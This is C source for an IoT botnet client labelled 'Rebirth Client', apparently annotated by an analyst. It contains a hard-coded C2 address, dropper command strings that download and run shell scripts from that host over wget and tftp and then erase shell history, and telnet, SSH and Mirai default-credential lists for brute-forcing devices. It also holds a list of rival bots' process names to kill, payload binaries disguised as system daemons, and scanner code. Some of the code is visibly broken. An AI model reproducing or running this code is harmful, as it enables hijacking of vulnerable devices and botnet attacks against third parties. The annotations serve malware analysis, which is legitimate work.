[c]Rebirth Client
  1. #include <stdlib.h>
  2. #include <stdarg.h>
  3. #include <stdio.h>
  4. #include <sys/socket.h>
  5. #include <sys/types.h>
  6. #include <netinet/in.h>
  7. #include <arpa/inet.h>
  8. #include <netdb.h>
  9. #include <signal.h>
  10. #include <strings.h>
  11. #include <sys/utsname.h>
  12. #include <unistd.h>
  13. #include <fcntl.h>
  14. #include <errno.h>
  15. #include <netinet/ip.h>
  16. #include <netinet/udp.h>
  17. #include <netinet/tcp.h>
  18. #include <sys/wait.h>
  19. #include <sys/ioctl.h>
  20. #include <net/if.h>
  21. #include <time.h>
  22. #include <dirent.h>
  23. #include <limits.h>
  24. #include <sys/stat.h>
  25. #include <sys/time.h>
  26. #include <string.h>
  27. #include <stdint.h>
  28. #include <stdio.h>
  29. #include <sys/param.h>
  30. #include <sys/time.h>
  31.  
  32. #define PR_SET_NAME 15 // prctl(2) option number for renaming the calling process; not referenced in this chunk
  33. #define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *)) // element count of the commServer C2 address table below
  34. #define PAD_RIGHT 1 // padding flags for the hand-rolled printf (prints/printi/print below)
  35. #define PAD_ZERO 2
  36. #define PRINT_BUF_LEN 12 // digit buffer in printi: a 32-bit value in base 10 plus sign and NUL fits
  37. #define CMD_IAC 255 // Telnet option-negotiation bytes (RFC 854): IAC, WILL, WONT, DO, DONT
  38. #define CMD_WILL 251
  39. #define CMD_WONT 252
  40. #define CMD_DO 253
  41. #define CMD_DONT 254
  42. #define OPT_SGA 3 // Telnet SUPPRESS-GO-AHEAD option code
  43. #define SOCKBUF_SIZE 1024 // size of the receive buffer attached to each telstate_t slot
  44.  
  45.  
  46.  
  47. char *getBuild() { // Returns a static label for the CPU architecture this binary was compiled for, chosen purely from predefined compiler macros. The caller is not in this chunk (presumably reported to the C2 on check-in).
  48. #if defined(__x86_64__) || defined(_M_X64)
  49. return "x86_64";
  50. #elif defined(__i386) || defined(_M_IX86)
  51. return "x86_32";
  52. #elif defined(__ARM_ARCH_4T__) || defined(__TARGET_ARM_4T)
  53. return "ARM-4";
  54. #elif defined(__ARM_ARCH_5_) || defined(__ARM_ARCH_5E_)
  55. return "ARM-5"
  56. #elif defined(__ARM_ARCH_6_) || defined(__ARM_ARCH_6T2_)
  57. return "ARM-6";
  58. #elif defined(_mips__mips) || defined(__mips) || defined(__MIPS_) || defined(_mips)
  59. return "MIPS";
  60. #elif defined(__sh__)
  61. return "SUPERH";
  62. #elif defined(__powerpc) || defined(__powerpc_) || defined(_ppc_) || defined(__PPC__) || defined(_ARCH_PPC)
  63. return "POWERPC";
  64. #else
  65. return "UNKNOWN"; // fallback when none of the architecture macros above is defined
  66. #endif
  67. }
  68. const char *useragents[] = { // Browser/device User-Agent strings. Their consumer is not in this chunk; presumably used to vary HTTP request headers — confirm against the rest of the file.
  69. "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
  70. "Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1",
  71. "Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)",
  72. "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4",
  73. "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
  74. "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911",
  75. "Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2",
  76. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)",
  77. "Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285",
  78. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7",
  79. "Mozilla/5.0 (PLAYSTATION 3; 3.55)",
  80. "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2",
  81. "wii libnup/1.0",
  82. "Mozilla/4.0 (PSP (PlayStation Portable); 2.00)",
  83. "PSP (PlayStation Portable); 2.00",
  84. "Bunjalloo/0.7.6(Nintendo DS;U;en)",
  85. "Doris/1.15 [en] (Symbian)",
  86. "BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
  87. "BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100",
  88. "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
  89. "Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01",
  90. "Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62",
  91. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
  92. "Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
  93. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19",
  94. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)",
  95. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)",
  96. "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Skyfire/2.0",
  97. "SonyEricssonW800i/R1BD001/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
  98. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)",
  99. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0",
  100. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)",
  101. "MOT-V300/0B.09.19R MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.0",
  102. "Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0",
  103. "Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000",
  104. "MOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1"
  105. };
  106. struct telstate_t { // Per-connection slot for the telnet credential-guessing scanner (TelnetScanner, further down).
  107. int fd; // socket to the current target; closed by advance_telstate(..., 0)
  108. unsigned int ip; // target address in network byte order (value returned by getRandomPublicIP / inet_addr)
  109. unsigned char state; // step in TelnetScanner's switch() state machine; 0 = pick/connect a target
  110. unsigned char complete; // 1 = this slot is finished and will be re-seeded with a new random target on the next state-0 pass
  111. unsigned char usernameInd; // index into Telnet_Usernames; advanced in lockstep with passwordInd
  112. unsigned char passwordInd; // index into Telnet_Passwords; reaching the end of either list marks the slot complete
  113. unsigned char tempDirInd; // index into Temp_Directorys (its use is not in this chunk)
  114. unsigned int tTimeout; // despite the name, holds the time(NULL) stamp of when the current state began; 0 means "not yet stamped" and is reset by advance_telstate
  115. unsigned short bufUsed; // not referenced in this chunk
  116. char *sockbuf; // receive buffer; TelnetScanner points every slot at one shared SOCKBUF_SIZE buffer rather than one per slot
  117. };
  118. int initConnection(); // defined later in the file (not in this chunk); presumably opens mainCommSock to a commServer entry
  119. void makeRandomStr(unsigned char *buf, int length);
  120. int sockprintf(int sock, char *formatStr, ...);
  121. char *inet_ntoa(struct in_addr in); // re-declaration of the libc function already provided by <arpa/inet.h>
  122. int mainCommSock = 0, currentServer = -1; // C2 socket (recvLine reads from it regardless of its argument) and the index into commServer
  123. uint32_t *pids; // heap array of child PIDs, grown by listFork()
  124. uint32_t scanPid; // PID of the scanner child (assigned outside this chunk)
  125. uint64_t numpids = 0; // number of entries in pids
  126. struct in_addr ourIP; // this host's own address; getRandomIP() derives same-network targets from it
  127. unsigned char macAddress[6] = {0}; // not referenced in this chunk
  128.  
  129.  
  130. unsigned char *commServer[] = { "104.168.170.60:443" }; // C2 host:port list (one entry). The same address is hard-coded as the payload/dropper host below — a single network indicator covers both the control channel and the downloads.
  131. char *Busybox_Payload = "cd /tmp || cd /var/system || cd /mnt || cd /lib;rm -f /tmp/ || /var/run/ || /var/system/ || /mnt/ || /lib/*;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;busybox wget 104.168.170.60/bin.sh;chmod 777;sh bin.sh;busybox tftp -g 104.168.170.60 -r tftp1.sh;chmod 777 *;sh tftp1.sh;busybox tftp -g 104.168.170.60 -r tftp2.sh;chmod 777 *;sh tftp2.sh;rm -rf *sh;history -c;history -w;rm -rf ~/.bash_history;cd /tmp || cd /var/system || cd /mnt || cd /lib;rm -f /tmp/ || /var/run/ || /var/system/ || /mnt/ || /lib/*;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;busybox wget 104.168.170.60/bins.sh;chmod 777;sh bins.sh;busybox tftp -g 104.168.170.60 -r tftp1.sh;chmod 777 *;sh tftp1.sh;busybox tftp -g 104.168.170.60 -r tftp2.sh;chmod 777 *;sh tftp2.sh;rm -rf *sh;history -c;history -w;rm -rf ~/.bash_history"; // Shell command chain for a target that has busybox (the code that sends it is not in this chunk): change to a writable directory, fetch bin.sh/bins.sh over HTTP and tftp1.sh/tftp2.sh over TFTP from the host above, execute them, then delete the scripts and clear shell history. Detection points: busybox wget/tftp to that host, chmod 777 in /tmp, and history wiping.
  132. char *Payload = "cd /tmp/;wget http://104.168.170.60/bins.sh;sh bins.sh;rm -rf bins.sh;cd /tmp/;wget http://104.168.170.60/bins.sh;sh bins.sh;rm -rf bins.sh"; // Same dropper flow using plain wget, for targets without busybox.
  133.  
  134. char *Python_Temp_Directory = "/etc/.../"; // Directory the secondary Python scanner is dropped into; the dotted name under /etc is chosen to look like a hidden configuration directory.
  135. char *Python_File_Location = "http://104.168.170.60/scan.py"; // Download URL for the Python scanner; same host as the C2.
  136.  
  137. char *BINS_HOST_IP = "104.168.170.60"; // Distribution host and dropper script names referenced by the payload strings above (note BIN.sh here versus bin.sh in Busybox_Payload).
  138. char *BIN = "BIN.sh";
  139. char *TFTP1 = "tftp1.sh";
  140. char *TFTP2 = "tftp2.sh";
  141. char *FTP1 = "ftp1.sh";
  142.  
  143. char *BINS1 = "ntpd"; //MIPS — per-architecture names the dropped bot binaries are given; each mimics a legitimate daemon or tool, so a process with one of these names whose on-disk path or hash does not match the distro package is a detection lead.
  144. char *BINS2 = "sshd"; //MIPSEL
  145. char *BINS3 = "openssh"; //SH4
  146. char *BINS4 = "bash"; //X86_64
  147. char *BINS5 = "tftp"; //ARMV6L
  148. char *BINS6 = "wget"; //I686
  149. char *BINS7 = "cron"; //POWERPC
  150. char *BINS8 = "ftp"; //I586
  151. char *BINS9 = "tftp"; //M68K
  152. char *BINS10 = "sh"; //SPARC
  153. char *BINS11 = "nut"; //ARMV4L
  154. char *BINS12 = "apache2"; //ARMV5L
  155. char *BINS13 = "telnetd"; //POWERPC440FP
  156.  
  157.  
  158. char *Telnet_Usernames[] = { // Vendor default logins tried by TelnetScanner: Telnet_Usernames[i] is sent with Telnet_Passwords[i], both indices advancing together. This list has 10 entries while the password list has 8, so the pair comments below do not line up past index 4. Defender note: these are factory defaults — rotate them and disable telnet where possible.
  159.  
  160. "telnet\0", //telnet:telnet
  161. "root\0", //root:root
  162. "root\0", //root:1234
  163. "root\0", //root:12345
  164. "root\0", //root:oelinux123
  165. "admin\0", //admin:admin
  166. "root\0", //root:Zte521
  167. "root\0", //root:vizxv
  168. "admin\0", //admin:1234
  169. "guest\0"
  170.  
  171. };
  172.  
  173.  
  174. char *Telnet_Passwords[] = { // Password half of the pairs above; 8 entries. Reaching the end of this list marks a scanner slot complete.
  175.  
  176. "telnet\0", //telnet:telnet
  177. "root\0", //root:root
  178. "1234\0", //root:1234
  179. "12345\0", //root:12345
  180. "oelinux123\0", //root:oelinux123
  181. "admin\0", //root:Zte521
  182. "vizxv\0", //root:vizxv
  183. "1234\0", //admin:1234
  184. };
  185.  
  186.  
  187.  
  188.  
  189.  
  190.  
  191.  
  192.  
  193. char *Mirai_Usernames[] = { // Mirai default-credential dictionary, index-paired with Mirai_Passwords; its consumer is not in this chunk. From the "klv1234" entry onward the list actually contains the password half of each pair (the trailing comments still name the username), i.e. it was copied from the password list.
  194.  
  195. "root\0", //root:xc3511
  196. "root\0", //root:vizxv
  197. "root\0", //root:admin
  198. "admin\0", //admin:admin
  199. "root\0", //root:888888
  200. "root\0", //root:xmhdipc
  201. "root\0", //root:default
  202. "root\0", //root:juantech
  203. "root\0", //root:123456
  204. "root\0", //root:54321
  205. "support\0", //support:support
  206. "root\0", //root:(none)
  207. "admin\0", //admin:password
  208. "root\0", //root:root
  209. "root\0", //root:12345
  210. "user\0", //user:user
  211. "admin\0", //admin:(none)
  212. "root\0", //root:pass
  213. "admin\0", //admin:admin1234
  214. "root\0", //root:1111
  215. "admin\0", //admin:smcadmin
  216. "admin\0", //admin:1111
  217. "root\0", //root:666666
  218. "root\0", //root:password
  219. "root\0", //root:1234
  220. "root\0", //root:klv123
  221. "Administrator\0", //Administrator:admin
  222. "service\0", //service:service
  223. "supervisor\0", //supervisor:supervisor
  224. "guest\0", //guest:guest
  225. "guest\0", //guest:12345
  226. "guest\0", //guest:12345
  227. "admin1\0", //admin1:password
  228. "administrator\0", //administrator:1234
  229. "666666\0", //666666:666666
  230. "888888\0", //888888:888888
  231. "ubnt\0", //ubnt:ubnt
  232. "klv1234\0", //root:klv1234
  233. "Zte521\0", //root:Zte521
  234. "hi3518\0", //root:hi3518
  235. "jvbzd\0", //root:jvbzd
  236. "anko\0", //root:anko
  237. "zlxx\0", //root:zlxx
  238. "7ujMko0vizxv\0", //root:7ujMko0vizxv
  239. "7ujMko0admin\0", //root:7ujMko0admin
  240. "system\0", //root:system
  241. "ikwb\0", //root:ikwb
  242. "dreambox\0", //root:dreambox
  243. "user\0", //root:user
  244. "realtek\0", //root:realtek
  245. "00000000\0", //root:00000000
  246. "1111111\0", //admin:1111111
  247. "1234\0", //admin:1234
  248. "12345\0", //admin:12345
  249. "54321\0", //admin:54321
  250. "123456\0", //admin:123456
  251. "7ujMko0admin\0", //admin:7ujMko0admin
  252. "1234\0", //admin:1234
  253. "pass\0", //admin:pass
  254. "meinsm\0", //admin:meinsm
  255. "tech\0", //tech:tech
  256. "fucker\0", //mother:fucker
  257. };
  258.  
  259. char *Mirai_Passwords[] = { // Password half of the Mirai pairs; "\0" entries are empty passwords.
  260.  
  261. "xc3511\0", //root:xc3511
  262. "vizxv\0", //root:vizxv
  263. "admin\0", //root:admin
  264. "admin\0", //admin:admin
  265. "888888\0", //root:888888
  266. "xmhdipc\0", //root:xmhdipc
  267. "default\0", //root:default
  268. "juantech\0", //root:juantech
  269. "123456\0", //root:123456
  270. "54321\0", //root:54321
  271. "support\0", //support:support
  272. "\0", //root:(none)
  273. "password\0", //admin:password
  274. "root\0", //root:root
  275. "12345\0", //root:12345
  276. "user\0", //user:user
  277. "\0", //admin:(none)
  278. "pass\0", //root:pass
  279. "admin1234\0", //admin:admin1234
  280. "1111\0", //root:1111
  281. "smcadmin\0", //admin:smcadmin
  282. "1111\0", //admin:1111
  283. "666666\0", //root:666666
  284. "password\0", //root:password
  285. "1234\0", //root:1234
  286. "klv123\0", //root:klv123
  287. "admin\0", //Administrator:admin
  288. "service\0", //service:service
  289. "supervisor\0", //supervisor:supervisor
  290. "guest\0", //guest:guest
  291. "12345\0", //guest:12345
  292. "12345\0", //guest:12345
  293. "password\0", //admin1:password
  294. "1234\0", //administrator:1234
  295. "666666\0", //666666:666666
  296. "888888\0", //888888:888888
  297. "ubnt\0", //ubnt:ubnt
  298. "klv1234\0", //root:klv1234
  299. "Zte521\0", //root:Zte521
  300. "hi3518\0", //root:hi3518
  301. "jvbzd\0", //root:jvbzd
  302. "anko\0", //root:anko
  303. "zlxx\0", //root:zlxx
  304. "7ujMko0vizxv\0", //root:7ujMko0vizxv
  305. "7ujMko0admin\0", //root:7ujMko0admin
  306. "system\0", //root:system
  307. "ikwb\0", //root:ikwb
  308. "dreambox\0", //root:dreambox
  309. "user\0", //root:user
  310. "realtek\0", //root:realtek
  311. "00000000\0", //root:00000000
  312. "1111111\0", //admin:1111111
  313. "1234\0", //admin:1234
  314. "12345\0", //admin:12345
  315. "54321\0", //admin:54321
  316. "123456\0", //admin:123456
  317. "7ujMko0admin\0", //admin:7ujMko0admin
  318. "1234\0", //admin:1234
  319. "pass\0", //admin:pass
  320. "meinsm\0", //admin:meinsm
  321. "tech\0", //tech:tech
  322. "fucker\0", //mother:fucker
  323.  
  324. };
  325. char *SSH_Usernames[] = { // Five default SSH logins, index-paired with SSH_Passwords; no SSH code is present in this chunk.
  326. "root\0", //root:root
  327. "admin\0", //admin:admin
  328. "admin\0", //admin:1234
  329. "root\0", //root:1234
  330. "ubnt\0", //ubnt:ubnt
  331. };
  332. char *SSH_Passwords[] = { // Password half of the SSH pairs above.
  333. "root\0", //root:root
  334. "admin\0", //admin:admin
  335. "1234\0", //admin:1234
  336. "1234\0", //root:1234
  337. "ubnt\0", //ubnt:ubnt
  338. };
  339.  
  340. char *Bot_Killer_Binarys[] = { // Process-name patterns (glob syntax, see wildString) of competing bots and droppers; the code that kills matching processes is not in this chunk. Where a comma is missing ("arm*" "tel*" and "cunty*" "IoT*") the compiler joins the adjacent literals into one pattern. For responders, this is a list of process names other IoT malware families have used.
  341. "mips",
  342. "mipsel",
  343. "sh4",
  344. "x86",
  345. "i686",
  346. "ppc",
  347. "i586",
  348. "i586",
  349. "jack*",
  350. "hack*",
  351. "arm*"
  352. "tel*"
  353. "b1",
  354. "b2",
  355. "b3",
  356. "b4",
  357. "b5",
  358. "b6",
  359. "b7",
  360. "b8",
  361. "b9",
  362. "lol*",
  363. "busybox*",
  364. "badbox*",
  365. "DFhxdhdf",
  366. "dvrHelper",
  367. "FDFDHFC",
  368. "FEUB",
  369. "FTUdftui",
  370. "GHfjfgvj",
  371. "jhUOH",
  372. "JIPJIPJj",
  373. "JIPJuipjh",
  374. "kmyx86_64",
  375. "lolmipsel",
  376. "mips",
  377. "mipsel",
  378. "RYrydry",
  379. "TwoFace*",
  380. "UYyuyioy",
  381. "wget",
  382. "x86_64",
  383. "XDzdfxzf",
  384. "xx*",
  385. "sh",
  386. "1",
  387. "2",
  388. "3",
  389. "4",
  390. "5",
  391. "6",
  392. "7",
  393. "8",
  394. "9",
  395. "10",
  396. "11",
  397. "12",
  398. "13",
  399. "14",
  400. "15",
  401. "16",
  402. "17",
  403. "18",
  404. "19",
  405. "20",
  406. "busybox",
  407. "badbox",
  408. "Mirai*",
  409. "mirai*",
  410. "cunty*"
  411. "IoT*"
  412. };
  413.  
  414.  
  415. int PythonRanges[] = { // Intended as "A.B" first-two-octet prefixes for the Python scanner, but stored in an int array: each floating literal is truncated on conversion (5.78 becomes 5), so only the first octet survives. Not referenced in this chunk.
  416. 5.78,
  417. 49.150,
  418. 91.98,
  419. 91.99,
  420. 101.108,
  421. 101.109,
  422. 119.93,
  423. 122.3,
  424. 122.52,
  425. 122.54,
  426. 124.104,
  427. 124.105,
  428. 124.106,
  429. 124.107,
  430. 125.25,
  431. 125.26,
  432. 125.27,
  433. 125.2
  434. };
  435.  
  436.  
  437. char *Temp_Directorys[] = {"/tmp/*", "/var/*", "/var/run/*", "/var/tmp/*", (char*) 0}; // Candidate writable directories on a target; (char*)0 terminates every list here for contains_string().
  438. char *advances[] = {":", "user", "ogin", "name", "pass", "dvrdvs", "mdm9625", "9615-cdp", "F600", "F660", "F609", "BCM", (char*)0}; // Substrings of login/password prompts (and a few device banners) that tell the scanner to send the next credential.
  439. char *fails[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", (char*)0}; // Substrings that indicate a rejected login (case-insensitive match, hence the dropped first letters).
  440. char *successes[] = {"busybox", "$", "#", "shell", "dvrdvs", "mdm9625", "9615-cdp", "F600", "F660", "F609", "BCM", (char*)0}; // Shell-prompt markers and device banners treated as a successful login.
  441. char *advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char*)0}; // Union of failure and prompt markers: "any response at all".
  442.  
  443. #define PHI 0x9e3779b9 // golden-ratio constant used to spread the seed across Q[] in init_rand
  444. static uint32_t Q[4096], c = 362436; // CMWC generator state: 4096-word lag table and carry
  445. void init_rand(uint32_t x) { // Seeds the CMWC generator (rand_cmwc) from x: the first three words come from x and PHI, the rest from an xor recurrence over the previous words and the index.
  446. int i;
  447. Q[0] = x;
  448. Q[1] = x + PHI;
  449. Q[2] = x + PHI + PHI;
  450. for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
  451. }
  452. uint32_t rand_cmwc(void) { // One step of a complementary-multiply-with-carry generator (multiplier 18782, lag 4096). Returns 32 pseudo-random bits and updates Q[i] and the carry c. Used for packet ids, random strings and same-network targets.
  453. uint64_t t, a = 18782LL;
  454. static uint32_t i = 4095; // position in Q, wraps via the mask below
  455. uint32_t x, r = 0xfffffffe;
  456. i = (i + 1) & 4095;
  457. t = a * Q[i] + c;
  458. c = (uint32_t)(t >> 32); // new carry is the high word
  459. x = t + c;
  460. if (x < c) { // low-word addition overflowed
  461. x++;
  462. c++;
  463. }
  464. return (Q[i] = r - x); // "complementary": store and return r - x
  465. }
  466. int contains_string(char* buffer, char** strings) { // Returns 1 if any pattern in the (char*)0-terminated list strings occurs in buffer (case-insensitive, strcasestr), else 0.
  467. int num_strings = 0, i = 0;
  468. for(num_strings = 0; strings[++num_strings] != 0; ); // counts entries up to the terminator; assumes the list is non-empty since index 0 is never tested
  469. for(i = 0; i < num_strings; i++) {
  470. if(strcasestr(buffer, strings[i])) {
  471. return 1;
  472. }
  473. }
  474. return 0;
  475. }
  476. int contains_success(char* buffer) { // 1 if buffer contains a shell-prompt/success marker from successes[]
  477. return contains_string(buffer, successes);
  478. }
  479. int contains_fail(char* buffer) { // 1 if buffer contains a login-failure marker from fails[]
  480. return contains_string(buffer, fails);
  481. }
  482. int contains_response(char* buffer) { // 1 if buffer holds either a success or a failure marker, i.e. the target answered the login attempt
  483. return contains_success(buffer) || contains_fail(buffer);
  484. }
  485. int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size) { // Waits up to timeout_usec for fd to become readable, then performs a single recv(). Returns 0 on timeout or select() error, otherwise recv()'s return value (which can be -1). The data is not NUL-terminated here.
  486. fd_set read_set;
  487. struct timeval tv;
  488. tv.tv_sec = 0;
  489. tv.tv_usec = timeout_usec;
  490. FD_ZERO(&read_set);
  491. FD_SET(fd, &read_set);
  492. if (select(fd+1, &read_set, NULL, NULL, &tv) < 1)
  493. return 0;
  494. return recv(fd, buffer, buf_size, 0);
  495. }
  496. int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings) { // Zeroes buffer, does one timed read (no loop, despite the name), answers a leading telnet IAC byte via negotiate(), and returns 1 if any pattern in strings appears in what was read, else 0. num_bytes and i are unused.
  497. int num_bytes, i;
  498. memset(buffer, 0, buf_size);
  499. num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
  500. if(buffer[0] == 0xFF) { // 0xFF = IAC: the peer started option negotiation
  501. negotiate(fd, buffer, 3); // only the 3-byte IAC <cmd> <opt> sequence is considered
  502. }
  503.  
  504. if(contains_string(buffer, strings)) {
  505. return 1;
  506. }
  507.  
  508. return 0;
  509. }
  510. const char* get_telstate_host(struct telstate_t* telstate) { // Returns the slot's target IP as a dotted quad; the string lives in inet_ntoa's static buffer and is overwritten by the next call.
  511. struct in_addr in_addr_ip;
  512. in_addr_ip.s_addr = telstate->ip;
  513. return inet_ntoa(in_addr_ip);
  514. }
  515. void advance_telstate(struct telstate_t* telstate, int new_state) { // Moves a scanner slot to new_state, clears its state timestamp and wipes its receive buffer. Moving to state 0 also closes the target socket.
  516. if(new_state == 0) {
  517. close(telstate->fd);
  518. }
  519. telstate->tTimeout = 0; // TelnetScanner re-stamps it with time(NULL) on the next pass
  520. telstate->state = new_state;
  521. memset((telstate->sockbuf), 0, SOCKBUF_SIZE);
  522. }
  523. void reset_telstate(struct telstate_t* telstate) { // Abandons the current target: closes the socket (state 0) and marks the slot complete so it is re-seeded with a new random IP.
  524. advance_telstate(telstate, 0);
  525. telstate->complete = 1;
  526. }
  527. void trim(char *str) { // Strips leading and trailing whitespace from str in place by sliding the kept run to the front and re-terminating.
  528. int i;
  529. int begin = 0;
  530. int end = strlen(str) - 1;
  531.  
  532. while (isspace(str[begin])) begin++;
  533.  
  534. while ((end >= begin) && isspace(str[end])) end--;
  535. for (i = begin; i <= end; i++) str[i - begin] = str[i];
  536.  
  537. str[i - begin] = '\0'; // i == end + 1 here, so this lands just past the last kept character
  538. }
  539. static void printchar(unsigned char **str, int c) { // Output sink for the mini printf below: append c to the caller's buffer when str is given, otherwise write the byte to fd 1 (stdout).
  540. if (str) {
  541. **str = c;
  542. ++(*str);
  543. }
  544. else (void)write(1, &c, 1); // writes the first byte of the int c; fine on little-endian
  545. }
  546. static int prints(unsigned char **out, const unsigned char *string, int width, int pad) { // Emits string through printchar, padded to width with spaces (or '0' when PAD_ZERO) on the left, or on the right when PAD_RIGHT. Returns the number of characters emitted.
  547. register int pc = 0, padchar = ' ';
  548. if (width > 0) {
  549. register int len = 0;
  550. register const unsigned char *ptr;
  551. for (ptr = string; *ptr; ++ptr) ++len;
  552. if (len >= width) width = 0; // width becomes "padding still owed"
  553. else width -= len;
  554. if (pad & PAD_ZERO) padchar = '0';
  555. }
  556. if (!(pad & PAD_RIGHT)) {
  557. for ( ; width > 0; --width) {
  558. printchar (out, padchar);
  559. ++pc;
  560. }
  561. }
  562. for ( ; *string ; ++string) {
  563. printchar (out, *string);
  564. ++pc;
  565. }
  566. for ( ; width > 0; --width) { // only reached with padding left when PAD_RIGHT was set
  567. printchar (out, padchar);
  568. ++pc;
  569. }
  570. return pc;
  571. }
  572. static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase) { // Formats integer i in base b (sg != 0 means signed, letbase 'a'/'A' selects hex digit case) into a local buffer, right to left, then hands it to prints for padding. Returns characters emitted.
  573. unsigned char print_buf[PRINT_BUF_LEN];
  574. register unsigned char *s;
  575. register int t, neg = 0, pc = 0;
  576. register unsigned int u = i;
  577. if (i == 0) {
  578. print_buf[0] = '0';
  579. print_buf[1] = '\0';
  580. return prints (out, print_buf, width, pad);
  581. }
  582. if (sg && b == 10 && i < 0) { // negative sign only for signed decimal
  583. neg = 1;
  584. u = -i;
  585. }
  586.  
  587. s = print_buf + PRINT_BUF_LEN-1;
  588. *s = '\0';
  589. while (u) {
  590. t = u % b;
  591. if( t >= 10 )
  592. t += letbase - '0' - 10; // map 10..15 onto letters starting at letbase
  593. *--s = t + '0';
  594. u /= b;
  595. }
  596. if (neg) {
  597. if( width && (pad & PAD_ZERO) ) { // zero padding: sign goes before the zeros
  598. printchar (out, '-');
  599. ++pc;
  600. --width;
  601. }
  602. else {
  603. *--s = '-';
  604. }
  605. }
  606.  
  607. return pc + prints (out, s, width, pad);
  608. }
  609. static int print(unsigned char **out, const unsigned char *format, va_list args ) { // Core of the mini printf: walks format, handling %s %d %x %X %u %c with optional '-' (right pad), '0' (zero pad) and a decimal width; everything else is copied through. out == NULL means write to stdout. Returns the character count; the output buffer, when used, is NUL-terminated but not bounds-checked.
  610. register int width, pad;
  611. register int pc = 0;
  612. unsigned char scr[2]; // one-character string for %c
  613. for (; *format != 0; ++format) {
  614. if (*format == '%') {
  615. ++format;
  616. width = pad = 0;
  617. if (*format == '\0') break; // trailing lone '%'
  618. if (*format == '%') goto out; // "%%" prints a literal '%'
  619. if (*format == '-') {
  620. ++format;
  621. pad = PAD_RIGHT;
  622. }
  623. while (*format == '0') {
  624. ++format;
  625. pad |= PAD_ZERO;
  626. }
  627. for ( ; *format >= '0' && *format <= '9'; ++format) {
  628. width *= 10;
  629. width += *format - '0';
  630. }
  631. if( *format == 's' ) {
  632. register char *s = (char *)va_arg( args, int );
  633. pc += prints (out, s?s:"(null)", width, pad);
  634. continue;
  635. }
  636. if( *format == 'd' ) {
  637. pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
  638. continue;
  639. }
  640. if( *format == 'x' ) {
  641. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
  642. continue;
  643. }
  644. if( *format == 'X' ) {
  645. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
  646. continue;
  647. }
  648. if( *format == 'u' ) {
  649. pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
  650. continue;
  651. }
  652. if( *format == 'c' ) {
  653. scr[0] = (unsigned char)va_arg( args, int );
  654. scr[1] = '\0';
  655. pc += prints (out, scr, width, pad);
  656. continue;
  657. }
  658. }
  659. else {
  660. out:
  661. printchar (out, *format);
  662. ++pc;
  663. }
  664. }
  665. if (out) **out = '\0';
  666. va_end( args ); // ends the caller's va_list; zprintf/szprintf rely on this
  667. return pc;
  668. }
